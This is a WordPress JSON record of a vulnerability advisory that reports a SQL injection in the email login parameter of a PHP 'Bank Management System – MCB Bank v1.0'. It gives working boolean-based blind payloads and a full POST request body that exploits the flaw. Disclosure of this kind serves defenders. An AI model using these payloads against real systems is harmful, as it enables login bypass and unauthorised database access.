{"id":21059,"date":"2022-02-25T19:00:01","date_gmt":"2022-02-25T16:00:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166149\/bms10-sql.txt"},"modified":"2022-02-26T00:11:44","modified_gmt":"2022-02-25T20:41:44","slug":"bank-management-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/bank-management-system-1-0-sql-injection\/","title":{"rendered":"Bank Management System 1.0 SQL Injection"},"content":{"rendered":"

# Title: Bank Management System – MCB Bank v1.0 – SQLi
\n# Author: nu11secur1ty
\n# Date: 02.25.2022
\n# Vendor: https:\/\/www.campcodes.com\/projects\/php\/ by:Tariq Fareeds
\n# Software: https:\/\/www.campcodes.com\/projects\/php\/bank-management-system-in-php-mysql-free-download\/
\n# Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/edit\/main\/vendors\/campcodes.com\/Bank-Management-System<\/p>\n

## Description:
\nThe email parameter from Bank Management System – MCB Bank v1.0
\nappears to be vulnerable to SQL injection attacks.
\nThe payloads 30735302′ or 9098=9098– and 41995976′ or 3071=3078–
\nwere each submitted in the email parameter.
\nThese two requests resulted in different responses, indicating that
\nthe input is being incorporated into a SQL query in an unsafe way
\nWARNING: If this is in some external domain, or some subdomain
\nredirection, or internal whatever, this will be extremely dangerous!
\nStatus: CRITICAL<\/p>\n

[+] Payloads:<\/p>\n

“`mysql
\n—
\nParameter: email (POST)
\nType: boolean-based blind
\nTitle: OR boolean-based blind – WHERE or HAVING clause
\nPayload: email=-9337′ OR 4870=4870– Cgzq&password=q7A!t8j!H2&cashierLogin=
\n—<\/p>\n

“`
\n## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/edit\/main\/vendors\/campcodes.com\/Bank-Management-System)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/hvaaiu)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Title: Bank Management System – MCB Bank v1.0 – SQLi # Author: nu11secur1ty # Date: 02.25.2022 # Vendor: https:\/\/www.campcodes.com\/projects\/php\/ by:Tariq Fareeds # Software: https:\/\/www.campcodes.com\/projects\/php\/bank-management-system-in-php-mysql-free-download\/ # Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/edit\/main\/vendors\/campcodes.com\/Bank-Management-System ## Description: The email parameter from Bank Management System – MCB Bank v1.0 appears to be vulnerable to SQL injection attacks. The payloads 30735302′ or 9098=9098– and …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21059","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21059"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21059\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21059"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21059"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}